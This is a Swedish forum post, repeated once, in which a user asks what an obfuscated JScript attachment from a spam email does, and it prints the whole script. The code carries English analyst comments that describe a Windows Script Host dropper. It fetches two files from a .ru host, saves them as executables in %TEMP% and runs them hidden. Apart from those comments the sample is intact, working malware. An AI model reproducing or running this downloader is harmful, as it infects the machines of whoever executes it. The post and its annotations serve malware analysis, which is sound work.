Hej!
Fick en intressant kodsnutt spammad till min arbetsmail.
Har ingen tidigare erfarenhet av att analysera skadlig kod, så jag vänder mig därför till er här på FB för att se vad skiten gör
Koden i originalfilen var skriven på endast en rad. Efter några minuters fixande i Sublime Text ser den ut så här:
Någon som förstår sig på skiten? Vore intressant att se vad baktanken är. Är detta en attack mot mig/mitt företag eller vanlig spam som slunkit igenom mitt spamfilter?
Mvh Pixl
Fick en intressant kodsnutt spammad till min arbetsmail.
Har ingen tidigare erfarenhet av att analysera skadlig kod, så jag vänder mig därför till er här på FB för att se vad skiten gör
Koden i originalfilen var skriven på endast en rad. Efter några minuters fixande i Sublime Text ser den ut så här:
VARNING, potentiellt skadlig kod!!!
Kod:
/*
 * Obfuscated JScript downloader (analysed, NOT cleaned up — do not run).
 *
 * Structure, as far as the visible code shows:
 *  - Almost every `var xxxx = (number expr)` / `"junk"["replace"](/[...]/g,"")`
 *    statement is dead code: its value is never read. Only the handful of
 *    statements commented below do anything.
 *  - Method names are hidden two ways: (a) `"str"["replace"](/[noise]/g,"")`
 *    strips noise characters from a string; (b) `"str"[(N)["toString"](radix)]`
 *    converts a large number to a base-32/33 string — the two instances that
 *    were worked through by hand both evaluate to "replace".
 *  - Host check: `window[...]` throws when there is no `window` object (e.g.
 *    under Windows Script Host), which routes execution into the catch blocks
 *    where the real payload lives. In a browser the outer try succeeds and
 *    nothing further happens.
 *  - Payload (function BQic): fetches a URL with MSXML2.XMLHTTP, writes the
 *    response body to %TEMP%\<name> via ADODB.Stream, and launches that file
 *    with WScript.Shell.Run. It is called twice with two URLs / two .exe names.
 *
 * Defender notes: this is a generic malware dropper, not something aimed at a
 * specific recipient — the same template was mass-mailed. Indicators to look
 * for on any host that may have executed it: the dropped executables under
 * %TEMP% (names decoded below), wscript.exe spawning a process from %TEMP%,
 * and outbound HTTP GETs to the decoded host. The decoded URL/file names below
 * were reconstructed by hand from the replace() calls — verify before acting.
 */
(function(){ var d6Dw="jIpChUHI8M`lapbVGHQAyZ"["replace"](/[QUaMbjGIy\`C]/g,""); YQWe=(35*"u&1Eg^I-.}hlrP"["length"]+3.0); SLLa="MIUk3fJD6h23KNT3A/dfgE"[(29.0+"2?v#*QY9<E;"["charCodeAt"](7)*351649585)["toString"]((2.0+"X\x88-\x80DAoqBn;OzR"["length"]*2))](/[\/DMh3UfgN]/g,""); var FIbF="uR%Zl9G3KONPEzyjvbKaV"[(0.0+"56aC\x603)\x86UAc-d9}b"["charCodeAt"](3)*529073801)["toString"](("t(\x88F8@X9p;*<75]rsdA"["charCodeAt"](4)*0+33.0))](/[\%lubOzjP3a9]/g,""); var F3Uo=(22*"~\x83PZm{Xb|(F\x87\x85;q"["length"]+12.0);oE4Y=(59.0+")\x833Y^2Bg>|6v\x84xlF"["charCodeAt"](8)*0); /* Host probe: `window` is undefined under WSH, so this throws and execution falls into catch(ee). */ try{ var qx7i=window[">weLbYr[tZb!r"["replace"](/[Z\!\[\>LYe]/g,"")]; QnSY="Pie)lGY~@W]b]g3AU9RqRW"[("10y\x81.2Wx"["length"]*2505503296+6.0)["toString"]((2*"u\x80ER&2P:p=;7"["length"]+6.0))](/[\~\]3\)RUGPi\@]/g,""); } catch(ee){ /* Second layer: the ProgID below decodes to nonsense ("ewrgve"), so `new ActiveXObject` throws again and control reaches catch(eee), where the payload is. Presumably an extra hurdle for emulators. */ try{ var S2SO=new ActiveXObject("!e0pwIrIg;vDe"[(28.0+"6\x7f/vM8E;saLJm]"["charCodeAt"](7)*600812621)["toString"](("#>4tLu)f(c=h"["length"]*2+9.0))](/[0\!\;DpI]/g,"")); var kgxq="`A;PCStG2U6QsRMv4D7m~a"[(359606151*"CZRK~${+[6A\x8b:j"["charCodeAt"](2)+80.0)["toString"]((0*"6=z<{BaH]p+sTX\x86\x83"["charCodeAt"](10)+32.0))](/[\~2DCMm4ts\`6\;]/g,""); } catch(eee){ /* BQic(fr, y_rI, rn): download `fr` to %TEMP%\y_rI and, if rn > 0, execute it. nPJL is a WScript.Shell instance (ProgID decoded from the noise string). */ function BQic(fr, y_rI, rn){ var nPJL = new ActiveXObject("vWjSKc;YrGnis3p9yts<.=S&hIe0l7+l"[("7AwK\x87sr"["length"]*4212529208+6.0)["toString"]((3*"UYkg\x86^>\x822"["length"]+5.0))](/[3I\+s7\;0n\&\<\=KyjvYG9]/g,"")); var G3QX="eQ+Nr]zJ2WibJS&aQY*6yknEZR"["replace"](/[eNa\*ykiY\+JE2\&Z\]]/g,""); /* y_rI becomes ExpandEnvironmentStrings("%TEMP%") + "\" (char 92) + the file name passed in. */ var y_rI = nPJL["ExpandEnvir"+(92>18?"\x6f":"\x66")+"nm"+"entSt"+(55>2?"\x72":"\x6b")+"ings"]("X%;KT4EjMgP<%"["replace"](/[4gK\<j\;X]/g,"")) + String["f"+(65>27?"\x72":"\x6d")+""+"omCharCod"+(85>25?"\x65":"\x5d")+""](92) + y_rI; var N4Xp="]d5=eprx4;OSoJvlbq9A;N"[(4212529208*"^B?#Vi\x83"["length"]+6.0)["toString"]((0*"D|,+\x80/S?-Mc&nA"["charCodeAt"](3)+32.0))](/[\;S5pJlq9\]\=x]/g,""); /* VOtw = MSXML2.XMLHTTP (ProgID decoded from the noise string on the next line). */ var VOtw = new 
ActiveXObject("DMOS4XiMlLY529.wXqM3L#GHzT`TyP"[(6.0+"[Jf/^0)V"["length"]*3685963057)["toString"]((2*"a~\x84U*Obd\x816rmuG"["length"]+4.0))](/[O94i5z3\#qywDYlG\`]/g,"")); var CvTR=(5*"_HIZt4\x85^JwTR5"["charCodeAt"](8)+17.0);/* onreadystatechange: when readyState === 4, open an ADODB.Stream (pxgg), set type = 1 (binary), write the HTTP ResponseBody, rewind (position = 0), saveToFile(y_rI, 2) (2 = overwrite), close. This is the standard "drop a binary to disk" sequence. */VOtw["onrea"+(56>26?"\x64":"\x5d")+"ystatechan"+"g"+(61>7?"\x65":"\x5c")+""] = function (){ if (VOtw["ready"+(82>39?"\x53":"\x4e")+"ta"+"t"+(79>9?"\x65":"\x5d")+""] === 4){ var pxgg = new ActiveXObject("]A=D(5O[#D0Bv.cS4thr[IeV9akm"[("\x83Y>c1"["length"]*7089588933+2.0)["toString"]((33.0+"6?NU#-MRn>IpvO\x82"["charCodeAt"](3)*0))](/[kc4\#9v5Vh\]\=0\[I\(]/g,"")); var PgEf=(14*"d<g0_eC(MfO"["length"]+9.0); pxgg[""+"ope"+(76>6?"\x6e":"\x69")+""](); var FOXG=(2.0+"3j$O.\x60_X/E\x86\x89\x85ic"["length"]*6); var wI9o="tw1Y&0b0LiTfFy=2uO3v;5"[("Bwf^\x8a\x80\x86&tZD5v_2"["charCodeAt"](9)*327641160+62.0)["toString"](("'\x88\x83rf>ykY*\x86"["charCodeAt"](8)*0+32.0))](/[3Ft\=1ui\;\&T0]/g,""); pxgg[""+"typ"+(65>47?"\x65":"\x60")+""] = 1; var MG8o=(3*"F\x602B;_a?n\x82u\x85(h1"["charCodeAt"](4)+48.0); pxgg[""+"w"+(93>29?"\x72":"\x68")+"ite"](VOtw["Re"+(99>9?"\x73":"\x6a")+"pon"+"seBo"+(80>36?"\x64":"\x5d")+"y"]); wqQc="8v(hg+ygABy8q5OzsSOPn~o"["replace"](/[O8nB\(gs5\+\~]/g,""); var uz3l=("i^9s3\x80IZCH"["length"]*22+9.0); var zQBJ=(12.0+"?O\x89e\x83,)\x81fTxr\x8a&6'{\x88"["charCodeAt"](5)*11); bTZQ="rO0N>D3hdeJG9oMT9rOC<lBY"["replace"](/[rBhTO\>Ne\<o3G]/g,""); Ut6x="[0XNX]4-JMP9if~)q#z2H7UR"["replace"](/[Uz\-MHiN\#\)\[\]\~0P]/g,""); pxgg["p"+(96>16?"\x6f":"\x67")+"sit"+""+(75>43?"\x69":"\x64")+"on"] = 0; var Achn="jXy%;wZQezpZO~9!7hULderb8"["replace"](/[jQrb\~dXzh\%\;ZU\!]/g,""); pxgg["saveT"+(97>6?"\x6f":"\x66")+"Fil"+"e"](y_rI, 2); var Y2Bg="Rl;ro*SxJyD5IRvgdprKG"[(4.0+"\x84Odv~B("["length"]*2337941245)["toString"]((29.0+"#4tDvNrd<\x871"["charCodeAt"](3)*0))](/[y\*po\;5RxKg]/g,""); pxgg["c"+""+(77>35?"\x6c":"\x65")+"ose"](); var Sg9P="tE!gbpA`jl58+k#2Tsa@aM/z"["replace"](/[\`\#\+2\@\/pMtgjs\!5]/g,""); 
Tecl="6hEzXeS/vaVg7Ng0MFBdy!w"[("(\x80\x81)MU"["length"]*3340671062+2.0)["toString"]((0.0+"z:+N@kVo3*vOT\x83B"["length"]*2))](/[\!E6g7Be\/MXya]/g,""); var iK4f=("rk+uY\x60J4m@"["charCodeAt"](7)*6+21.0); var QgeT="@V8v(qWV@VcU[6XGFJYIx"[(4430993083*"B\x89n<>tQq"["length"]+3.0)["toString"]((9.0+"D\x88pY6Vk=Me?\x81"["length"]*2))](/[XJI\[cF\(8W\@]/g,""); } ; var J1nH=(8*"R$#*E.;(NbQ0\x81\x89FL}dp"["charCodeAt"](7)+16.0); } ; var eeer="8c4oKsfmjN7v=xdSSgStEIIh"[(1.0+"vfbDe];"["length"]*3483875876)["toString"]((31.0+"pm/L|F)x<T"["charCodeAt"](9)*0))](/[K8\=7IfxS4jt]/g,""); var zqKq=(11*"]4&K^B$*\x87O\x84-S)"["charCodeAt"](13)+23.0); var hPCU=("\x60/D\x82+LSTvGdjV"["charCodeAt"](12)*1+47.0);JIPx="UMIw9UAW2oE%pq-zPj<8el;9"["replace"](/[\-MwAPU\%p\;o2e\<]/g,""); /* Synchronous request: open("GET", fr, false) then send(). Because the request is synchronous the onreadystatechange handler above has already written the file by the time Run() is reached. Run(path, 0, 0) = WScript.Shell.Run with window style 0 (hidden) and no wait. The empty catch(er) swallows every failure, so nothing is ever reported to the user. */ try { VOtw["o"+(52>28?"\x70":"\x6a")+"e"+"n"]("pGuEyT"["replace"](/[yup]/g,""), fr, false); var xJho="~w4Gvy;0FVbdt&7nA1nIkhg"[("QLs=\x8an.tuRKy\x83"["charCodeAt"](10)*795501774+68.0)["toString"]((0*"\x8a~02v[pf#\x80<"["charCodeAt"](10)+36.0))](/[dhnvVAk\&F\;4\~]/g,"");sO0H=("\x81zRku\x7f\x85It"["length"]*47+2.0); VOtw[""+""+(66>30?"\x73":"\x6a")+"end"](); var PHeR="pjTlIEfOQgI*tr10uKxXkd"["replace"](/[\*0kQTKrIfpx]/g,""); if (rn > 0){ nPJL[""+"R"+(80>34?"\x75":"\x6d")+"n"](y_rI, 0, 0); lIKq=("KQ\x86Sv}qE<'"["length"]*20+6.0); uNdb=(8*"wj<XZs\x81#W)2\x8a4"["charCodeAt"](12)+22.0); } ; MC1S="iGSO(m#[cDgEBDiV52rZlB"["replace"](/[ED5\#lS\[r\(i]/g,""); } catch (er){ } ; hKZY=(2*"36z>\x83@\x8af9^wGp"["charCodeAt"](5)+1.0); tnkd="r4dLh7EDQiykuB>E`3bgfPx"[(6300863351*":s?BNPJT"["length"]+1.0)["toString"](("d56/Z\x88\x80T"["length"]*4+3.0))](/[ghDu7ryPd\`\>bQ]/g,""); } /* First drop: by hand the URL appears to decode to http://moody1.ru/images/onewindows.jpg and the file name to 4762711.exe; rn = 1 so it is executed. The ".jpg" extension on the server is cosmetic — the body is saved as an .exe. Verify the decode by isolating the two replace() calls in a sandbox. */ BQic("#hN*tAt-pM:lW/S_/Bm)HoOoFd<yF1z.k2r-uG/Eli#Xm3Iacvg%feEsT/kOo>&n=+e96w5=iFln<d-o(w!sX0.5jCpVg"["replace"](/[\(\*c\_HB\<6z\)kV\=WA953NlO\>\-I\&0XMTv\%fFC2E\!GS\+\#]/g,""),"y4b7W6F2D7j1p+1U.qetxMce"["replace"](/[tcWDFqUy\+pMjb]/g,""), 1); var GqFC=(3.0+"8x\x88\x60Kh\x87w@uWjt)"["length"]*27); 
LUpv="mI_52tuifaTNuHE36O4QT&O"["replace"](/[uQ2af6N4m\&E\_]/g,""); /* Second drop, same host: URL appears to decode to http://moody1.ru/images/twowindows.jpg, file name to 3755839.exe (the file-name string uses the toString(32) trick for "replace"); rn = 1 so it is executed too. */ BQic("Mh!tUxtEOp6z:H/L/HmcoPo9dvAyc1vk.crB#u@/V@ixm23aWgWe*SsxQ/ztfw@olw=iRn<dLKoANwqs7.Ej>p>g"["replace"](/[7QOzKfNl9Ux\=SR3AM2vBV\!EcLk\#W\<H6\*\@\>Pq]/g,""),"q3z(7y5`5m8&;3o9o@.-eMx@e"[(2457308705*"t@s\x7fZ\x86WdOeDg"["length"]+2.0)["toString"](("EL7eiO>"["length"]*4+4.0))](/[oy\@\`\;z\&\(\-mqM]/g,""), 1); vm5w=(48.0+"q:\x82\x7f$0\x89L/\x60WT\x836wp"["charCodeAt"](7)*5); var B9NZ="/dA4V!k40xI7>TgY=hE_j9a"["replace"](/[4d\/x9h7\=\>\_\!g]/g,""); var u4zb=(3*"Cskx\x88Z|o+V'y\x87"["charCodeAt"](9)+20.0); }}; var EaNe="ChaNAc5YL7xUl61SeW`fKq"["replace"](/[WULx6CK5\`SaA]/g,""); var Bkiw=(33*"@|g\x81PaKcj3Sp="["length"]+0.0);; var wTnK=(51*"Z?sENq3"["length"]+1.0)})();//xKhNb7dUGM
Någon som förstår sig på skiten? Vore intressant att se vad baktanken är. Är detta en attack mot mig/mitt företag eller vanlig spam som slunkit igenom mitt spamfilter?
Mvh Pixl